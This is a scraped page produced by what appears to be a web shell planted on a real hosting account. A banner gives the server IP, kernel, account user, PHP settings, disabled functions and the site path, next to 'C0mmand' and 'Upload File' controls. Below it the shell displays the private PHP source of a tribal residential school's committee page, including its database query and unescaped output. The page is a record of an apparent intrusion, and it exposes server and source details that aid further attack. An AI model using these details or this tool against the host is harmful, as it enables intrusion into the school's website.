Server IP : 86.38.243.181 / Your IP : 216.73.216.51 Web Server : LiteSpeed System : Linux in-mum-web1336.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64 User : u986601745 ( 986601745) PHP Version : 7.4.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u986601745/domains/emrskalsi.com/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en" style="overflow-x: hidden;"> <head> <meta http-equiv="content-type" content="text/html;charset=UTF-8" /> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Eklavya Model Residential School - District Level Committee</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Learn about the District Level Committee for Eklavya Model Residential School Kalsi, Dehradun. Find information on committee members, roles, responsibilities, and governance for the tribal school."> <meta name="keywords" content="Eklavya Model Residential School District Level Committee, EMRS Kalsi Committee Members, District Committee EMRS Dehradun, Tribal School Governance, EMRS Administrative Committee, Roles and Responsibilities EMRS, School Management Committee EMRS Kalsi, District Education Committee, EMRS Uttarakhand Governance, EMRS Kalsi Administration"> <meta property="og:title" content="Eklavya Model Residential School - District Level Committee" /> <meta property="og:description" content="Learn about the District Level Committee for Eklavya Model Residential School Kalsi, Dehradun. Find information on committee members, roles, responsibilities, and governance for the tribal school." /> <meta property="og:image" content="https://emrskalsi.com/images/logo.png" /> <meta property="og:url" content="https://emrskalsi.com/distric-level-commetee.php" /> <meta property="og:type" content="website" /> <?php include('include/header.php'); ?> <div class="breadcrumbs"> <div class="container"> <!-- <h1 class="pull-left"> Vidyalaya Level Committees</h1> --> <ul class="pull-left breadcrumb"> <li><a href="#">Administration</a></li> <li><a href="vidyalaya-level-committees.php">Distric Level Commetee</a></li> </ul> </div> </div> </div> <style>.menshow{display:block !important}</style> </div></div><div class="container-fluid" id="pr"> <div class="row"><div class="col-xs-12 col-md-12 col-lg-12 col-sm-12" ><div class="ap-section "> <div class="headline" id="headlines"><h2 > Distric Level Commetee</h2> </div> <div class="ap-plain" > <div class="table-responsive"> <table class="table table-bordered table-hover " border="2" width="701"> <thead> <tr> <th colspan="5" width="701">The following staff members are hereby allotted the duties as mentioned against their names for the academic year 2020-21 for the smooth conduct of all the programmes as per NVS Norms. </th> </tr> <tr> <th>S.NO</th> <th>NAME OF THE COMMITTEE</th> <th>MEMBERS</th> <th colspan="2">NATURE OF DUTIES</th> </tr> </thead> <tbody> <?php $q = "select * from distric_level_commetee"; $query = mysqli_query($conn,$q); $i=1; while($res = mysqli_fetch_array($query)) { ?> <tr> <td><?php echo $i++; ?></td> <td><?php echo $res['name'] ?></td> <td><?php echo $res['member'] ?></td> <td><?php echo $res['duties'] ?></td> </tr> <?php } ?> </tbody> </table></div> </div> </div></div></div> </div> <?php include('include/footer.php'); ?>